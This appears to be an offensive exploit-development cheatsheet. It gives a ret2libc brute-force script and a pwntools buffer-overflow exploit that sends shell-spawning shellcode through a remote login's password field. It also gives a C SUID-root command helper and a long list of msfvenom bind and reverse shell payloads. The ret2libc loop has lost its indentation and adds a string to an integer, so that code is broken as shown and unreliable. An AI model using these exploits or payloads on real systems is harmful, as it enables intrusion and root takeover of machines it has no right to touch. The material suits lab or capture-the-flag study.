Cheatsheet
Exploit Development
Print a hex-escaped string (file contains \x41\x42... on one or more lines) as raw bytes
printf "$(tr -d '\n' < file.txt)"    # quote the substitution so the shell does not word-split or glob it; a literal % in the data is read by printf as a format directive
Cross compile for 32-bit Windows with mingw32 (output defaults to a.exe) and test it under wine
i586-mingw32msvc-gcc a.c
wine a.exe
Passing binary data as an argument or on stdin
command "$(python -c 'print ...')"          # as argv: quote it; argv entries are C strings, so a NUL byte (\x00) truncates the payload there
python -c 'print ...' | command             # on stdin
cat file - | command                        # file contents first, then the "-" keeps stdin attached so an interactive shell stays usable
python -c 'print ...' | cat file - | command
Printing shell code
(Bash) echo -e '\x31\xc0\x50\x68\x2f...'               # echo -e is bash-specific; printf '\x31\xc0...' is portable
(Python) python -c 'print "\x31\xc0\x50\x68\x2f..."'   # Python 2 syntax; print appends a newline (use sys.stdout.write to avoid it)
(Perl) perl -e 'print "\x31\xc0\x50\x68\x2f..."'
ret2libc
- Find the libc base address as loaded for one run: ldd /usr/local/bin/backup
  (under ASLR the base changes on every execution; only the offsets below are stable, which is why the script brute-forces the base)
- Find the offset of libc's system function: readelf -s /lib32/libc.so.6 | grep ' system@'
- Find the offset of libc's exit function: readelf -s /lib32/libc.so.6 | grep ' exit@'
  (anchor the symbol name: a bare grep for system or exit also matches svcerr_systemerr, _exit, atexit, ...)
- Find the offset of a "/bin/sh" string inside libc (-t x prints the offset in hex): strings -a -t x /lib32/libc.so.6 | grep /bin/sh
import struct, subprocess
libc = 0xf75e2000
sysOffset = 0x0003a940
sysAddress = libc + sysOffset
exitOffset = 0x0002e7b0
exitAddress = libc + exitOffset
binsh = libc + 0x0015900b
payload = "A" * 512
payload += struct.pack("<I", sysAddress)
payload += struct.pack("<I", exitAddress)
payload += struct.pack("<I", binsh)
attempts = 0
while True:
attempts += 1
print "Attempts: " + attempts
subprocess.call(["/usr/local/bin/vulnerable-binary", "arg1", "arg2", payload])
Network attack
from pwn import *
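# Linux/x86 shellcode, bytes reproduced unchanged from the original listing
# (the original string literal had been split across three lines mid-escape).
# It appears to be a "socket reuse" payload that dup2()s the connected socket
# over fds 0-2 and then execve()s /bin//sh -- disassemble it to confirm before
# relying on that.
SHELLCODE = (
    b"\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6\x31\xc9\x56\x5b\x6a\x3f\x58\xcd"
    b"\x80\x41\x80\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6\x56\x68\x2f\x2f\x73"
    b"\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"
)
RET_ADDR = 0xffffd630  # stack address the saved EIP is pointed at; moves with ASLR/environment
PADDING = 28           # bytes from the start of the PASS buffer to the saved return address
HOST = "10.10.10.34"
PORT = 7411


def build_payload(ret_addr=RET_ADDR, shellcode=SHELLCODE, padding=PADDING):
    """Return padding + little-endian return address + shellcode as bytes.

    Everything is kept as bytes: the original mixed a str literal with the
    bytes returned by p32(), which fails with TypeError on Python 3.
    """
    return b"A" * padding + p32(ret_addr) + shellcode


def main():
    """Log in with the fixed username and send the overflow as the password."""
    payload = build_payload()
    r = remote(HOST, PORT)
    print(r.recv(1024))
    r.sendline(b"USER admin")
    print(r.recv(1024))
    r.sendline(b"PASS " + payload)
    r.interactive()


if __name__ == "__main__":
    main()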
Simple SUID Binary
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
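/* Minimal SUID helper: installed root-owned with the set-uid bit
 * (chown root a.out && chmod 4755 a.out) it runs CMD as root.
 * Real and effective IDs are both raised so that the /bin/sh started by
 * system() does not drop the effective uid again (bash does so when
 * euid != uid unless run with -p). */
#define CMD "id"

int main(void)
{
    /* The original ignored the return value: if the binary is not actually
     * SUID root, setuid(0) fails and CMD silently runs as the caller. */
    if (setgid(0) != 0 || setuid(0) != 0) {
        perror("setgid/setuid");
        return 1;
    }
    /* system() goes through /bin/sh and the caller's PATH; use absolute
     * paths for anything dropped on a real target. A -1 return means the
     * shell could not be started at all. */
    return system(CMD) == -1 ? 1 : 0;
}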
Msfvenom
Payloads (selection; `msfvenom -l payloads` prints the full list for the installed version)
cmd/unix/bind_awk
cmd/unix/bind_busybox_telnetd
cmd/unix/bind_inetd
cmd/unix/bind_lua
cmd/unix/bind_netcat
cmd/unix/bind_netcat_gaping
cmd/unix/bind_netcat_gaping_ipv6
cmd/unix/bind_nodejs
cmd/unix/bind_perl
cmd/unix/bind_perl_ipv6
cmd/unix/bind_r
cmd/unix/bind_ruby
cmd/unix/bind_ruby_ipv6
cmd/unix/bind_socat_udp
cmd/unix/bind_stub
cmd/unix/bind_zsh
cmd/unix/generic
cmd/unix/reverse
cmd/unix/reverse_awk
cmd/unix/reverse_bash
cmd/unix/reverse_bash_telnet_ssl
cmd/unix/reverse_ksh
cmd/unix/reverse_lua
cmd/unix/reverse_ncat_ssl
cmd/unix/reverse_netcat
cmd/unix/reverse_netcat_gaping
cmd/unix/reverse_nodejs
cmd/unix/reverse_openssl
cmd/unix/reverse_perl
cmd/unix/reverse_perl_ssl
cmd/unix/reverse_php_ssl
cmd/unix/reverse_python
cmd/unix/reverse_python_ssl
cmd/unix/reverse_r
cmd/unix/reverse_ruby
cmd/unix/reverse_ruby_ssl
cmd/unix/reverse_socat_udp
cmd/unix/reverse_ssl_double_telnet
cmd/unix/reverse_stub
cmd/unix/reverse_zsh
cmd/windows/adduser
cmd/windows/generic
cmd/windows/powershell_bind_tcp
cmd/windows/powershell_reverse_tcp
cmd/windows/reverse_powershell
firefox/exec
firefox/shell_bind_tcp
firefox/shell_reverse_tcp
generic/shell_bind_tcp
generic/shell_reverse_tcp
java/shell/bind_tcp
java/shell/reverse_tcp
java/shell_reverse_tcp
linux/x64/exec
linux/x64/shell/bind_tcp
linux/x64/shell/reverse_tcp
linux/x64/shell_bind_tcp
linux/x64/shell_reverse_tcp
linux/x86/adduser
linux/x86/chmod
linux/x86/exec
linux/x86/shell/bind_tcp
linux/x86/shell/reverse_tcp
linux/x86/shell_bind_tcp
linux/x86/shell_reverse_tcp
multi/meterpreter/reverse_http
multi/meterpreter/reverse_https
nodejs/shell_bind_tcp
nodejs/shell_reverse_tcp
osx/armle/shell/bind_tcp
osx/armle/shell/reverse_tcp
osx/armle/shell_bind_tcp
osx/armle/shell_reverse_tcp
osx/ppc/shell/bind_tcp
osx/ppc/shell/reverse_tcp
osx/ppc/shell_bind_tcp
osx/ppc/shell_reverse_tcp
osx/x64/exec
osx/x64/shell_bind_tcp
osx/x64/shell_reverse_tcp
osx/x86/exec
osx/x86/shell_bind_tcp
osx/x86/shell_reverse_tcp
php/bind_php
php/download_exec
php/exec
php/reverse_perl
php/reverse_php
php/shell_findsock
python/shell_bind_tcp
python/shell_reverse_tcp
r/shell_bind_tcp
r/shell_reverse_tcp
ruby/shell_bind_tcp
ruby/shell_reverse_tcp
windows/adduser
windows/dllinject/bind_tcp
windows/dllinject/reverse_tcp
windows/download_exec
windows/exec
windows/powershell_bind_tcp
windows/powershell_reverse_tcp
windows/shell/bind_tcp
windows/shell/reverse_tcp
windows/shell_bind_tcp
windows/shell_reverse_tcp
windows/upexec/bind_tcp
windows/upexec/reverse_tcp
windows/x64/exec
windows/x64/powershell_bind_tcp
windows/x64/powershell_reverse_tcp
windows/x64/shell/bind_tcp
windows/x64/shell/reverse_tcp
windows/x64/shell_bind_tcp
windows/x64/shell_reverse_tcp